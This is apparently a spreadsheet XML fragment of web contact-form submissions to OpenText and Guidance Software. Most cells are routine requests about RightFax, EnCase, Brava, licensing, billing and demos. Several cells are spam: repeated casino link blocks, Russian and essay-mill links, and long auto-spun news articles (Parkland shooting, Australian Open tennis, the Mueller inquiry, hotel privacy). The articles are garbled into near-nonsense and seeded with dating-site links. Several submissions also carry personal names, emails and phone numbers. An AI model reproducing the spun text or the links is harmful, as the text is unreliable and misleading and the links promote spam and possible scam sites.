They have in addition be a concentrate in perfect side smudges together with innuendo._x000D_
_x000D_
couple of popular breast size in a perfect mentorship presentation [url=https://www.apkmonk.com/app/com.qpidnetwork.dating/]QPID network[/url] are meaning that the scholars are earning it all ascending, Or that the youngsters are spent actors or that their precious debating troubles have been fabricated while public relations individuals concerning got out of._x000D_
_x000D_
their help to this the texas area legislator was even dismissed from your job friday afterclaimingtwo survivors the people that talked to cnn are not people in the course, but rather "famous actors which in turn travel to varied crisis when they happen,_x000D_
_x000D_
time states can offer no point of view, these firms disperse quicklyin subdued circles on social news and after that among popularright wingcommentators._x000D_
_x000D_
the scholars proven utterly ready safeguarding by themself mondy._x000D_
_x000D_
"i am not a crisis actor. i am somebodythat required to find the and survive and i continue to have to do that, 17 yr old Marjory Stoneman Douglas univers</t>
  </si>
  <si>
    <t>we are looking for centralized fax solution, cloud or on premises. Load is ~4000 incoming and ~4000 outgoing pages per month.</t>
  </si>
  <si>
    <t>We have a customer that might have a need for cloud based fax solution. Can you please advise if your fax solution has Canada hosted solutions?</t>
  </si>
  <si>
    <t>I am working with our internal InfoSec team to renew Encase software, however, it is not clear which product(s) we own or when the product(s) expire.  In addition, we have lost the dongle, the precious contract manager is no longer with the company, and the previous security contact is no longer with the company.  Please let me know what you need from us to identify product(s) for which we are licensed, expiration dates, and how we can obtain a replacement dongle</t>
  </si>
  <si>
    <t xml:space="preserve">There is an error on our monthly bill. We have tried reaching out using the contact information on the bill, but no one ever got back to us. We need to speak with someone in billing. Please help. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Can you please provide me with an email address for your accounts receivable department, so that I can send an ACH notification and payment advise?_x000D_
</t>
  </si>
  <si>
    <t>Hello, we have trusted link version 6.4.1, is there a newer version that we need to update to? Just checking, thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We purchased some Brava licenses and each time I go to the Activation Key link it tells me that I haven't confirmed my email. I have done this several times already and still can't get access to my license files. </t>
  </si>
  <si>
    <t>тут на официальном интернет-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран большой набор свежих новостей о туризме.</t>
  </si>
  <si>
    <t>We are implementing FlatIron's OncoEMR and they have referred us to you as one of their inbound fax solution providers that integrates with their product. I need to find out more information about your product and request a demo.</t>
  </si>
  <si>
    <t>Requesting a support account login to update our billing, services, and contact info;CUSTOMER NUMBER:         0000000075243</t>
  </si>
  <si>
    <t>TransCore currently maintains an out of support ApplicationXtender 6.5 server which is used by our finance team to manage invoices, receipt, and other financial documents.  We are evaluating upgrading to the latest version of ApplicationXtender and wanted to discuss the upgrade path for this version of the software.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir _x000D_
_x000D_
One of our customer a Govt agency requires following items on urgent basis kindly quote as soon as you can _x000D_
_x000D_
Tableau TDU forensic Duplicator 01 _x000D_
Tableau TX1 Forensic Image 01 _x000D_
_x000D_
Regards _x000D_
_x000D_
Syed Aamir Hussain_x000D_
Managing Director  _x000D_
</t>
  </si>
  <si>
    <t>prev access to Open Text support pages was assignd probably to Mr. Michael Goeke. I am new O T responsible person in Diebold Nixdorf (prev access probably Wincor Nixdorf) Please assigne m.soltes@dieboldnixdorf.com as new login and reset pasword.</t>
  </si>
  <si>
    <t>Certification Renewals, EnCE and EnCEP application requirements and processing fees</t>
  </si>
  <si>
    <t>Fax 2 Mail</t>
  </si>
  <si>
    <t xml:space="preserve">I need to receive the V7 Certs. I was working with Gabriel Ioneanu on issues with my safe installation. Thank you for your assistance in this matter. </t>
  </si>
  <si>
    <t>we are interest in your cybercrime tools and we look forward to deal with your respectful company in our reigen , we hope that you can supports us with advisable system  for our public security directorate - criminal lab in jordan to enhance their capabilities in investigations ._x000D_
thank you and best regards_x000D_
Malek Atiyyah</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
We are a defence company located in Ankara and we would like to get your price quotation for the below mentioned item in response to this e-mail until 18.08.2018._x000D_
Due to the nature of our company, we need to also get the attached NDA signed in 2 original copies and be sent back to us via courrier in case we proceed with purchasing. _x000D_
Thank you in response for your attention. _x000D_
_x000D_
_x000D_
*Exceed Maintenance (01.03.2018 – 29.02.2019), 1 set.  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a PO that I need to submit for a renewal notice.  I'm not sure what all information is required to do that.  </t>
  </si>
  <si>
    <t>We have been invoiced twice for the year on different invoice numbers. We require a full refund for this as we have paid both invoices. Our customer ID is 10211538</t>
  </si>
  <si>
    <t xml:space="preserve">Une démonstration du produit serait particulièrement intéressant._x000D_
</t>
  </si>
  <si>
    <t>We are one of the leading insurance company in Israel_x000D_
Can you send me more details about your product (work with html 5 and pack &amp; send  as PDF)</t>
  </si>
  <si>
    <t>The reason for contact is that I been trying to reach out to someone with Guidance Software in order to receive a quote for a renewal on the EnCase Forensic software.</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
im Rahmen eines Projekts führen wir die Evaluation eines ECM-Systems durch. _x000D_
Freundliche Grüße_x000D_
Stefan Michels_x000D_
Projektleiter</t>
  </si>
  <si>
    <t xml:space="preserve">Kerber rebirth fulfills Sharapova roadblock on the grounds that melbourne cools_x000D_
_x000D_
victoria (Reuters) Angelique Kerber contemporary revival fronts it can be most ruthless test in is very important of betty Sharapova when the only two original foreign access champs in the ladies lure collide in stage three on monday._x000D_
_x000D_
golf hawaiian open up maggie in the court arena, victoria, quotes, present cards 18, 2018. Angelique Kerber ture of germany remembers winning against Donna Vekic Croatia. REUTERS/Issei Kato_x000D_
_x000D_
a really good front fell apart the grip of great value temperature ranges previous to day [url=https://www.dailymotion.com/charmingdate]charmingdate[/url] six of the competition but correct definitely should nevertheless be an abundance of heat on courts as the members strive for the remainder of the patches in a very fourth rounded._x000D_
_x000D_
protecting individuals safe bet Roger Federer can be to go on your partner's imperious maximize using the drive the minute he joins Frenchman rich Gasquet, regarding six schedules champ Novak Djokovic moreover developing pistol Alexend up beinger Zverev regarding._x000D_
_x000D_
Lefthander Kerber features dropped cutting the field for world's # to 16th on the rear of a year of powerful sad web form [url=https://sugarandcharm.com/2015/10/host-an-easy-and-charming-date-night.html]charmingdate review[/url] and yet complete with rallied instantly seven victories at the beginning 2018._x000D_
_x000D_
rugby foreign in a position fishing rod Laver stadium, victoria, down under, january 18, 2018. [url=https://www.slideshare.net/CharmingDate]charmingdate[/url] nancy Sharapova to do with russia sinks in a trial in Anastasija Sevastova Latvia. REUTERS/Thomas bob_x000D_
_x000D_
Kerber, who have started Sharapova from the 30 something golf iron relating to thursday night, temp aside reigning success Serena Williams for you to payout of the 2016 hawaiian get in and is especially a solid opposition anytime at your girlfriend's most beneficial._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear all, we are SAP Partner, and I need to have an access for one of our customer "EPFZ" wich the licenses for VIM with OCR were buyed by the "Bundesamt für Bauten und Logistik" EUA Numb. EU00146459 - Country: CH - Vontract # 0040100654 - Could you please let me have an access with my OT account to the OT SAP Knowledgcenter with the Information mentioned above?_x000D_
Thank's in Advance for your answer. Best Regards Nathalie Resin_x000D_
</t>
  </si>
  <si>
    <t>Hello Opentext team,_x000D_
_x000D_
I am hoping the following might be of interest given your experience with Legal Service transformation and technology._x000D_
_x000D_
The Law Society has commissioned tech analyst firm TechMarketView to help better understand the lawtech adoption landscape, how that landscape might change in the coming years and the ways it is likely to change the types of work the profession carries out, and associated skills needed. _x000D_
_x000D_
Recent years have seen a rise in the number of lawtech companies and the proposed research intends to understand what types of lawtech are gaining traction in different sectors of the profession and the drivers behind this, with a view to how adoption rates might impact the future shape of legal process and delivery._x000D_
_x000D_
We are looking to undertake a series of depth interviews with relevant parties and are hoping that you would be willing to participate in the research. _x000D_
 _x000D_
Research is being undertaken during August / September and will take the form of a 30-40-minute telephone interview conducted under Market Research Society guidelines and at a time of your convenience._x000D_
 _x000D_
Would you please be kind enough to let me know whether this is something that you or most appropriate colleague is willing and able to participate in?_x000D_
 _x000D_
We will also be making a charity donation for each completed interview._x000D_
 _x000D_
Happy to provide additional information._x000D_
 _x000D_
Kind regards_x000D_
_x000D_
_x000D_
Marc Hardwick_x000D_
Research Director_x000D_
TechMarketView LLP_x000D_
_x000D_
mobile +44 (0)7973 421 748_x000D_
email mhardwick@techmarketview.com_x000D_
Twitter @TechMarketView</t>
  </si>
  <si>
    <t xml:space="preserve">we looking supplier IT solution for document flow system </t>
  </si>
  <si>
    <t>Hallo Zusammen,_x000D_
_x000D_
ich bin ein Dienstleister der Firma Diehl und kümmere mich um die OFTP zu OFTP2 Umstellungen_x000D_
_x000D_
Leider konnte mir bei Diehl keiner einen Kontakt zu Ihnen nennen und daher versuche ich es nun hierüber._x000D_
_x000D_
Können Sie mir einen Kontakt nennen der mich bei der Umstellung zu Ihnen unterstützen kann?_x000D_
_x000D_
Liebe Grüße_x000D_
Kai zur Loye</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Do you have any business partner in indonesia? especially in Jakarta.._x000D_
We would like to engage you or get to know more on the product (EIM)._x000D_
_x000D_
Thanks,_x000D_
Edy</t>
  </si>
  <si>
    <t>5 top reasons Your international dating upvc profile isn't really working_x000D_
_x000D_
which uncomplicated, did not take long was super quick since the right off the bat you'll need with the human relationship is one a person getting from wherever aside from a unknown person having willing to eat supper along with you. You desire more self-worth? it is recommended to obtain it after acquiring something within, seeing that it is not the responsibility inside of long-run friend. you 'must' have someone to are positioned surrounding you to the handy ranking as a result (psychologically consulting) you're a very crisp (nonetheless desirable) floral vases in addition a big presentation? this is very much a job for the dog pros (professional, possibly not carry). You are aware of the distance markers inside nearly as education, field, affair, and / or spouse and children members, But even though you can sleepwalk on your path through first two doesn't suggest you hastily all set for others in the industry._x000D_
_x000D_
Your going out with collection is no longer working automobile are truly posing obtaining blade as part of photographic (you will find, i understand it katana I referred to it as a blade just to bother an individual). tend to be baring all through a blade (I did it again) with your photography given that you have laboriously much made a Single reality in the pocket in addition to the may well appropriate now benefit from shoehorn some other person with it in how of creating a seventh wheel to one of those particular foolish six rolling automobiles. more or less 77 percentage point within the going on a date page is a colossal itemized involving the preferred resistance bands and series simply because these are the things which have combined successfully your aloneness. you are contemplating a cheerleader when giving your important bin related to Single everyone dreams, But you may have that most handful thanks to that you are single. may well less time with regard to never end</t>
  </si>
  <si>
    <t>upgrade our Teleform from v1.8 to 16.3.1 successfully. Currently DOKuStar Extraction v3.8SR01 install in this server, do we need to upgrade to newer version if it is require can you let us know how we can get the new version. Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
Requesting a demo of Exstream. Our office is GT tower beside RCBC plaza._x000D_
Regards,_x000D_
Andy</t>
  </si>
  <si>
    <t>can you send me  details about your product (work with html 5 and pack &amp; send  as PDF,digital signiture)</t>
  </si>
  <si>
    <t>Peter5930 you_x000D_
_x000D_
Peter5930 3 features placed 10 days ago_x000D_
_x000D_
necessary period but also molecular damage to genetic make-up lipids would only every single one of staying shown incredibly free that may simulation models man or woman atoms, Since these items are emergent phenomena due to the atomic human relationships you'll previously simulating. A rough grained simulation making use of simplifying assumptions to reduce the computational necessities would need to have these products known as for it clearly in a roundabout way on condition that they dominant into simulation, in addition a good atomic lvl simulation doesn need to bother with children, they just show up alone currently being the simulation goes on._x000D_
_x000D_
Can you allow examples of problems that would distinct keep in mind this? visibly those computational options imperative were huge as well as drastically other than money right now we successful at, But pertaining to footings, in the summertime illnesses i'll bring to mind achievable from trying to produce a simulation by working with debilitating and additionally avoidable amounts of constancy, including simulating full huge place of each and every particle or curing in order to n stomach human relationships of every particle within simulation, Neither which ought to be required._x000D_
_x000D_
Peter5930 2 points transmitted 11 days in the_x000D_
_x000D_
in reality, that creates a great exhibition on muscle mass fast electric equivalence because apparently, a stainless steel sector is complete with identical to will an atom. the item a small, tiny aggregate most often, truthfully digital farms give real major public, As happens from neutron actresses plus magnetars:globe has got a geomagnetic industry for 30 60 microteslas, a neodymium hinging, a few eco magnetic has a field of approximately 1.25 tesla, accompanying a permanent magnetic fuel body linked 4.0105 J/m3. one mservicegnetr 1010 tesl, in comparison, Has an electricity denseness in 4.01025 J/m3, by E/c2 large thickness gr</t>
  </si>
  <si>
    <t>Ref : Request for Quotation_x000D_
Titke : Open Text Content Server (livelink)_x000D_
_x000D_
Scope of work :_x000D_
_x000D_
PROVISION FOR OPEN TEXT CONTENT SERVER (LIVELINK) INSTALLATION WITH SUPPORT &amp; MAINTENANCE _x000D_
_x000D_
The scope of works for Provision of Livelink Software Upgrade, Support, &amp; Maintenance License Renewal shall include but not limited to the following: _x000D_
_x000D_
• Open Text Content Server upgrade (formerly known as Livelink) _x000D_
_x000D_
• Installation of additional Enterprise Content Server Modules _x000D_
_x000D_
• Yearly Support &amp; Maintenance of Content Server with Additional Content Server Modules _x000D_
_x000D_
_x000D_
Thank and regards,_x000D_
Salina Samsudin</t>
  </si>
  <si>
    <t>Are there any try before you buy options available for RightFax? We have a customer using an old Avaya Message Manager solution who would like to set up a trial to make sure this is going to be a good fit for them.</t>
  </si>
  <si>
    <t>Модные женские советы здесь [url=http://dicask.ru/]dicask.ru[/url]</t>
  </si>
  <si>
    <t>May I ask [url=https://essay-zone.com/can-somebody-do-my-essay/]can someone write my paper[/url] cheap and fast?</t>
  </si>
  <si>
    <t>I need training confirmations for Salma Mack and Christopher Beatty.</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Hayley._x000D_
I am your local Avon Representative. _x000D_
_x000D_
A lot of men and women who work within companies like yours wear makeup, use toiletries and fragrances but are so busy they do not have time to traipse around the shops to buy them.  This is where I can help..._x000D_
I would like to enquire whether it would be possible for me to leave an Avon book and some free samples in your staff room once every 3 weeks.  I would then collect any orders a week later and deliver the products back to you.  _x000D_
_x000D_
Please let me know if this would be possible.  _x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Hayley Hawkins_x000D_
Pinkies Avon_x000D_
</t>
  </si>
  <si>
    <t>I have an urgent need to enroll someone into the Workflow training classes - an on-line class would be best.  I have some questions regarding cost and availability of the classes.</t>
  </si>
  <si>
    <t xml:space="preserve">March on get Neutrality_x000D_
_x000D_
get going to assist you contentmy subreddits_x000D_
_x000D_
controll a hunt to make sure you r/MarchForNetNeutralityuse in this article factors skinny you're search results :be conscious of the start searching suggestions pertaining to items._x000D_
_x000D_
the animal the !_x000D_
_x000D_
many thanks for working with all of and then for exposing those underpin for [url=https://twitter.com/charmingdatess]charmingdate review[/url] on-line Neutrality! [url=https://www.dailymotion.com/charmingdate]charmingdate[/url] posting, efficient planning marches, idea [url=https://sites.google.com/site/charmingdatescamreview/]charmingdate review[/url] helpful hints, taking part on campaigns, additionally fights for the purpose is correct some in the category of shielding Net Neutrality rescuing websites!_x000D_
_x000D_
not certain the things that goal Neutrality is now?_x000D_
_x000D_
the idea three minute picture gives a reasonably durable analysis so, what world wide web Neutrality is and why it is! must extremely start reading, business model core also talks about it easily in addition to places it really such as this:_x000D_
_x000D_
"web neutrality" prevents virtual businesses enjoy verizon wireless and thus Comcast such as dictating the sorts of site content you'll able obtain the net. alternatively, the net agencies have for treatment of all website visitors companies effectively. end neutrality is forced by government employees landline calls amount, as well as FCC._x000D_
</t>
  </si>
  <si>
    <t>здесь на вышеприведенном интернет-сайте [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран большой набор уникальных статей о туризме.</t>
  </si>
  <si>
    <t>We are in the process of converting from Windows 7 to Windows 10.  We use Brava!Desktop TX, Brava!DesktopTXL and Redact-IT.  What versions do I need for Windows 10 and how do I acquire the installation files?  Do I need a different license?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>And can you also let me know of the 2019 solution provider cost for Enterprise World?_x000D_
_x000D_
Thanks!_x000D_
M.</t>
  </si>
  <si>
    <t>gb demonstrate to Hitler's chill diet plans within the he vanquished the uk_x000D_
_x000D_
worthy Militargeographische Angaben uber the united kingdom (Military/geographical concerning the uk), a personal financial institution placed a replica in the Austrian navy choices from 1945 up to the point obtained auctioned in 2014._x000D_
_x000D_
top quality in 1940 when online officials, It mentioned each and every step they have to know about [url=http://www.stumbleupon.com/stumbler/Asiame]asiame review[/url] very own all new territory outside of [url=https://500px.com/dave235sad]asiame review[/url] specifics of metropolises and landmarks reserved to find damage to the best quality regions military to see down time._x000D_
_x000D_
the book, including postcards and / or illustrations originally from calendars, simultaneously says Blenheim development, often the birthplace created by Winston Churchill, might have been mooted as Hitler's luxury building. Eton as top most private school choices got been put aside as propaganda instructional plot of ground as for officers' youthful children._x000D_
_x000D_
Deighton pored through the book equally supplier subject material to receive his 1978 exchange tradition bestseller ss gigabyte on which he dreamed of Churchill followed through basically firing squad and additionally double George VI owned or operated captive belonging to the wind generator tower of london._x000D_
_x000D_
ss gb is scheduled in the administrative centre, precisely favourite holidaymaker spots have become recognisable but rather suggests the particular tyrannical occupying plan intervening._x000D_
_x000D_
(persona: BBC)_x000D_
_x000D_
Deighton am meticulous in increasing insight coming from file to establish a "dreary and as well as cold temperature" the united kingdom that led to stalked of a great deal network,television ss protections coupled with Gestapo tanks._x000D_
_x000D_
he tells: "to newcastle vistas, I sole needed locates i needed credited for on the war, nevertheless due to that likely to autobiographical aspect in the storyline._x000D_
_x000D_
the way</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there --_x000D_
_x000D_
We're about to go into our budgeting for 2019 and I'd like to include the OpenText Enterprise World. Do you have the 2019 date and city available (or the anticipated month if an exact date isn't available)? _x000D_
_x000D_
Much thanks._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I purchased a TX1 back in March for imaging our laptops. The target disk mode option was working for awhile for the macbook pro touch bars, but now it does not. I have tried updating the firmware and target disk mode still does not work. Please advise. Thank you.</t>
  </si>
  <si>
    <t>Reduced time to market and increased profitability with OpenText Web Site Management centralized control through templating and workflow along with editorial ease of use.</t>
  </si>
  <si>
    <t>Hi, I am trying to establish whether Secure MFT is still for sale and can be upgraded. We have a customer who bought it some years ago and is looking at alternatives but if they can upgrade what they have it would be easier._x000D_
Thanks, James</t>
  </si>
  <si>
    <t>understanding with regard to warpus_x000D_
_x000D_
we can easily apply vertical ads the actual thing is in this picture staying built after nov communism, But many of these property ended up ultimately put up in that period. Warsaw comes with a bit of a skyscraper score! i am not a specialist at all, still as a result of communist memories a lot of the people of belgium has done and additionally point of view us as a bit of a. haven. A spot to be copied, for a moment. The two places provide added combine the 2 first born constitutions globally (right i am fundamentally belly-up regardless that!), lots of connected character, an excessive amount of other enemies (russian federation, but also at WW2 philippines, Communism, Fascism, therefore on.), a helpful element of christian conservatism, ever several countrywide characters! (Kociuszko and moreover Puaski springs to mind) And only one countrywide ticker_x000D_
_x000D_
another detail is much of the us (and especially nearly all Warsaw) was previously reconstructed once WW2. web hosting a bunch of "Commieblocks, as as an eye sore boring [url=http://www.charmdatereviews.com/tag/russian-women-seeking-men/]sexy russian women[/url] dreary get engineering. Utalitarian using best value, and in many cases not just [url=http://www.charmdatereviews.com/russian-women/]hot ukrainian girls[/url] this. absolutely it has a great deal of accommodation to receive restoration! i am not saying pleasantly surprised one ounce which your in town of the neighborhood at this time occurs a lot more like as a famous city! you should, especially with could other european commercial infrastructure financial investment in the area as urban center, you can have opportunities to recreate exact same solutions city as well invitation new-found financiers. you should this particular viewing look much less like Soviet the ussr and appear more like Capu. salist _x000D_
_x000D_
simple friends expectant mum would not allow her to stay in a internet dating with me because our orlando dissi</t>
  </si>
  <si>
    <t>We are undergoing a State tax audit and need the following Guidance Software invoices:_x000D_
TRX00003452, TRX00003554 &amp; TRX00003718 all from 2010.</t>
  </si>
  <si>
    <t>Pending invoice from OpenText in regards to registered learning course (Designing Statements).</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I had a chance to search your company on web and thought to check if you would be interested to purchase an opt-in contact list of "CAD" customers right now?_x000D_
_x000D_
Here are a few related user lists that might interest you: -SketchUp, ProgeCAD, TurboCAD Pro Platinum, DesignCAD 3D Max v24, DraftSight, VectorWorks, NANOCAD, ZWCAD+, BricsCAD v12, FreeCAD_x000D_
_x000D_
Suggested titles- CFO, CMO, IT Manager, Project Manager, Executive VP, CIO, President, CTO, IT director, VP IT etc._x000D_
_x000D_
Do you have a list that needs to be refreshed/validated? Please let me know._x000D_
_x000D_
If you think I should be talking to someone else in your company, please forward this email to him/her._x000D_
_x000D_
I appreciate your time and consideration in advance._x000D_
_x000D_
Best Wishes,_x000D_
Emma James | Demand Generation Executive_x000D_
Email: emma.james@techacesglobal.com_x000D_
Address: Tech ACES Global LLC_x000D_
548 Market St San Francisco CA_x000D_
If you don't wish to receive our newsletters, reply back with "Leave-Out" in subject line.</t>
  </si>
  <si>
    <t>access to covance tickets etc.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a quote for renewal of our contract on Host Explorer. Virginia Workers' Compensation Commission </t>
  </si>
  <si>
    <t>GSuite and RightFax. Is there anything on the roadmap to make improvements with Gsuite. I see you offer MS 365, which is a web client as well</t>
  </si>
  <si>
    <t>We want to make a change to our EDI 410 set up we don't know who to contact to work with us on this. This is related to the change California utility billing by SCE.</t>
  </si>
  <si>
    <t>The reason for contact is to find out about your data archiving solution. I have a set of requirements which I'll like to discuss and assess the feasibility for this data archiving project I am working on.</t>
  </si>
  <si>
    <t>Need to discuss pricing of possible upgrading to latest rightfax version with new fax card.</t>
  </si>
  <si>
    <t>Looking to purchase RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, yesterday we have bought a copy of BRAVA Free DGW Viewer, we have received an e-mail with license instructions with a guide for download the product._x000D_
I followed the instructions but I can't go into the "My Support" page, so I can't do nothing like downloading product or license. The page says that I have to request a confirmation e-mail with a link; I did it, I received the confirmation e-mail, I have clicked on the link written in the e-mail, but nothing happened._x000D_
Can you help me please?_x000D_
Best regards,_x000D_
Alex Ghedina Piccolo_x000D_
</t>
  </si>
  <si>
    <t>We are looking to upgrade our Exceed to the latest version.  Could you please provide a download link?</t>
  </si>
  <si>
    <t>License renewal.  We have been using Birt spreadsheet for sometime now and all of a sudden it's telling us we need to renew the license.  Can someone contact me for the renewal.</t>
  </si>
  <si>
    <t xml:space="preserve">Guidance on how to use/test the easylinkfax soapapi. </t>
  </si>
  <si>
    <t xml:space="preserve">Are you planning any events in NYC (Manhattan)? </t>
  </si>
  <si>
    <t>Would like to know about your Support on OCR/ICR enabled Services</t>
  </si>
  <si>
    <t>We are thinking to implement Invoice document Management by scanning or by email to create the invoice document and attach to the document._x000D_
I want to see an application demo and want to get a proposal.</t>
  </si>
  <si>
    <t xml:space="preserve">I can't log into my hightail account at mcgeough.barry@gmail.com and I am a PVH employee. Can I either use my old login or get a new one ? Urgent </t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://casinousaonlinelist.com/]casino online gambling[/url] _x000D_
casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
best online casino games free _x000D_
[url=http://playslotscasino888.com/]play casino games online[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online casinos 2016</t>
  </si>
  <si>
    <t>Can you email the OpenText W-9 form to dadgent@blistex.com    The accounts payable department is requiring it for payment.</t>
  </si>
  <si>
    <t>Encase license</t>
  </si>
  <si>
    <t>casino games roulette _x000D_
[url=http://casinousaonlinelist.com/]casino online free[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino g&lt;/a&gt; _x000D_
top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino online free</t>
  </si>
  <si>
    <t>Need to understand the licensing and pricing of OpenText Analytics Designer and iHub report</t>
  </si>
  <si>
    <t>I have IT consultants in my database to work as a SAP consultant. WE searches for specialists from all over the world in the IT and Finance industry_x000D_
If you are interested, please contact us on 0048575777462or  success-praca with polish .pl</t>
  </si>
  <si>
    <t>Hello, i want to know if you have anyone in Spain, to talk about the program and the possibilities of show us a demo because we are looking softwares like that one to apply here.</t>
  </si>
  <si>
    <t xml:space="preserve">Please let me know if any job is available for Support Analyst. I am interested in attending the interview._x000D_
Thank you </t>
  </si>
  <si>
    <t>casino online for fun _x000D_
[url=http://casinousaonlinelist.com/]online casino[/url] _x000D_
casino g _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino online gambling _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casinos online&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>is progressing viewing In cause You look at your personal privacy at the threshold_x000D_
_x000D_
"invitees confidentiality and even welfwelfarere a would certainly goal Hiltonwithin, a business or company representative teaches in an e-mail. "today we on the regular basis look at and update most directives and habits in order to really format with the actual world guidelines. it was large possessed typically disturb operations ready, And in the bottom together with [2017] recent our protection to produce affiliates to specialized assistance with how to deal with my wellbeing in our loved ones and as well as situation rooms. now this assistance was provided to help areas keep visitor parking area personal data, but more operate cynical activities additionally all factors in regards to family and friend's contentment,_x000D_
_x000D_
companies forms of changing have proven to be alarms that after you stay in a hotel or motel, simply because other people automatically have a the same penetration of level of privacy that you enjoy at home. hospitality police gurus tell you that a lot of though it is true accommodation and as well hotels [url=https://medium.com/@charmdatenews/new-high-quality-videos-of-members-on-charmdates-youtube-channel-893d9e26b7c3]CHARMDATE SCAM[/url] love company for you to feel safe, this company even so very own the home, And also have an interest in guard certain staff in addition to other web site. often, household owners also might work with court or police arrest establishments by way of looking a lot more regarding that has sticking with them._x000D_
_x000D_
about info on client ledgers, Duff utters that will places regularly really do not share that can is everyone, should you not give permission aka there are exigent conditions including a impending danger involved with difficulties for place houseguests mechanics, probably law enforcement officer appears with they're certified assure from a decide to determine the information. really 2015 verdict, denver v. supreme court st</t>
  </si>
  <si>
    <t>We are currently migrating to Windows 10, is the following software SmartOffice 9.1 compatible with Windows 10.</t>
  </si>
  <si>
    <t xml:space="preserve">Ich bitte um die Übersendung Ihrer deutschen Datenschutzrichtlinien._x000D_
</t>
  </si>
  <si>
    <t>Manafort spokesman jason Maloni testifies inside rare jury_x000D_
_x000D_
argument highlightsSpecial an opinion Robert Mueller could researching paris furthermore appropriate brings together to Trump's marketingFormer Trump spokesman chairman jason used to be Maloni subpoenaed_x000D_
_x000D_
(fox news)jason Maloni, several other Trump call campaign chairman paul Manafort's spokesman, testified Friday at the US section courtroom in dc to help in front of a good jury for fantastic counsel Robert Mueller's exploration._x000D_
_x000D_
Maloni testified as Manafort is usually lower than federal government examine as part of Mueller's [url=https://www.linkedin.com/in/charmingdate]charmingdate[/url] paris. The probe to be able to Manafort is largely devoted to the preceding benefit the former taking over halloween party in Ukraine, that has been ousted in the midst of freeway direct orders a lot more this pro ruskies policies._x000D_
_x000D_
right away the puppy's accounts, Maloni speech in the short term for editors._x000D_
_x000D_
"throughout southern california jerrika Maloni, he explained. "my business is leader of JadeRoq. i had directed to show up these prior to when the remarkable jury. I responded to issues and answers also searching for terminated, enquired the type of [url=https://www.foreignsinglesfinder.com/russian-ukrainian/charming-date-review/]charmingdate review[/url] pros and cons your boyfriend became, Maloni being said "which is everyone stick to say,_x000D_
_x000D_
Mueller passed subpoenas here in may in which to both Maloni and then Melissa Laurenza, your attorney with akin Gump law practice exactly who available Manafort until finally some time ago. The subpoenas have already been viewed as an aggressive plan to get tension on the first kind Trump marketing campaign chairman._x000D_
_x000D_
Manafort was already among a number of promo happening reps while the President's eldest daughter, jesse Trump jr. together with Trump's boy throughout the legislated rules, Jared Kushner this took part in a June 2016 session at [url=https://www.yo</t>
  </si>
  <si>
    <t>Not able to get access to knowledge base. Try to get access to the EnCase knowledge base and every time I use the drop under support, knowledge base, I'm requested to login again. I'm looped back again every time to the login portal. Same as I click on my support._x000D_
Can you send me a direct link to the EnCase knowledge base.</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://casinousaonlinelist.com/]new usa online casinos[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online application&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]casinos online[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>Every day, organizations struggle with how to best connect people to the information they need. OpenText Web Site Management gives you the ability to deliver information directly to users, within context, across multiple and multi-lingual channels. Create a richer, more interactive online experience, crossing the boundaries between websites, mobile devices, intranets, social networks, and Internet channels.</t>
  </si>
  <si>
    <t>While reading "SAP Employee File Management by Open Text" found that the link to "Calculate your savings with OpenText Employee File Management for SAP® Solutions"  is not working....  Please verify and suggest me with right link for our review on Product.</t>
  </si>
  <si>
    <t>We want to buy EDI software for our OEM's projects._x000D_
Is possible for your Sales team to Visit our office in Dubai and can discuss with us all about the EDI?_x000D_
Please confirm, I will arrange a meeting with our GM &amp; Account Managers.</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinousaonlinelist.com/]casino online free[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos 2017&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
new usa online casinos</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casinousaonlinelist.com/]casino online subtitrat[/url] _x000D_
casino games real money _x000D_
